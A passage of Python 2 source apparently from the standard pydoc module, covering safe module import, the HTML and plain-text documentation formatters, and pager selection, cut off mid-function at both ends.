module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Avoid simply calling reload() because it leaves names in
# the currently loaded module lying around if they're not
# defined in the new source file. Instead, remove the
# module from sys.modules and re-import. Also remove any
# submodules because they won't appear in the newly loaded
# module's namespace if they're already in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"http://docs.python.org/library")
basedir = os.path.join(sys.exec_prefix, "lib",
"python"+sys.version[0:3])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return _encode('''
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
<meta charset="utf-8">
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents), 'ascii')
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif selfdot:
# Create a link for methods like 'self.method(...)'
# and use <strong> for attributes like 'self.attr'
if text[end:end+1] == '(':
results.append('self.' + self.namelink(name, methods))
else:
results.append('self.<strong>%s</strong>' % name)
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = '<a href="file:%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = _binstr(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(_binstr(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
def isnonbuiltinmodule(obj):
return inspect.ismodule(obj) and obj is not __builtin__
modules = inspect.getmembers(object, isnonbuiltinmodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda key_value, s=self: s.modulelink(key_value[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(_binstr(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(_binstr(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value, name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
pass
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
try:
attrs.sort(key=lambda t: t[0])
except TypeError:
attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br> </tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', join(submodules, '\n'))
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = _binstr(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', _binstr(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', _binstr(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', _binstr(object.__credits__))
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value,
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if type(sys.stdout) is not types.FileType:
return plainpager
if not hasattr(sys.stdin, "isatty"):
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(_encode(text))
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
